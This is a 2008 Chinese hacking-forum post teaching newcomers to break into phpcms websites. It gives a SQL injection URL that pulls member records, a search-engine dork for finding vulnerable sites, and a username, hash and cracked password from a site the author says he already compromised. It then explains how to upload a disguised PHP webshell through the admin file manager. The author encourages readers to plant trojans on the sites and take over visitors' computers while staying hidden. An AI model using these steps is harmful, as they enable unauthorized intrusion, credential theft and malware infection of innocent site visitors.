|
|
楼主 |
发表于 2008-10-10 15:12:46
|
显示全部楼层
|阅读模式
来自 广东省广州市
黑狼基地 菜鸟起飞的乐园www.nb5.cn
我们有狼的精神!有困难不怕,就怕遇不到困难
黑狼基地与朋友们携手共创美好明天!欢迎光临黑狼基地!
-------------------------------------------------------------------------
大家好,我是mvp213,今天带给大家的是phpcms的漏洞入侵,不敢说是0day了,因为有写日子了,不过存在漏洞的网站还是不少的,漏洞代码出在message/friend.php这个文件,对变量$username不为空就进行了数据库查询,比较严重也是比较弱智的漏洞,,注射语句为http://www.xxx.com/phpcms/house/web.php?username=luoye%cf'union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65/**/from/**/phpcms_member/*
对于我们广大菜鸟来说,手动注射是很费时费力的,所以我们用工具吧,呵呵,小工具,首先去Google或者百度搜关键字“powered by phpcms”,然后就是找了啊,今天时间有限,不去实际测试了,找个刚才拿下的吧baiqingfeng
1d9a26005e63bb2410fdf412e64ad85a
用户名和密码
942580,去后台看看,后台地址一般是admin.php。如果改了就要有工具来查后台了
这个我刚才登陆过了啊,呵呵,有的人说要改上传的后缀名然后去发个帖子,太费时了啊,来个简单的,不用备份数据库,呵呵,文件管理器,直接上传就好了,改名字要改成比较隐蔽的啊,还有就是后缀名要写.php,千万别忘了,上传成功了,访问下吧,恩恩,如何啊,呵呵,很简单实用的小工具入侵,现在用这个程序的网站不少,大家去挂马抓鸡,呵呵,不过要注意隐蔽啊,还有就是别用全站挂马啊,很危险的,注意也不要去政府和爱心网站,一是为了自己的安全,黑狼基地还是需要我们来进行交流的,再见,我是mvp213,我的qq:345096.
------------------------------------------------------------------------------------------------------
教程下载地址:点击下载 |
|
发表于 2008-10-15 09:39:10
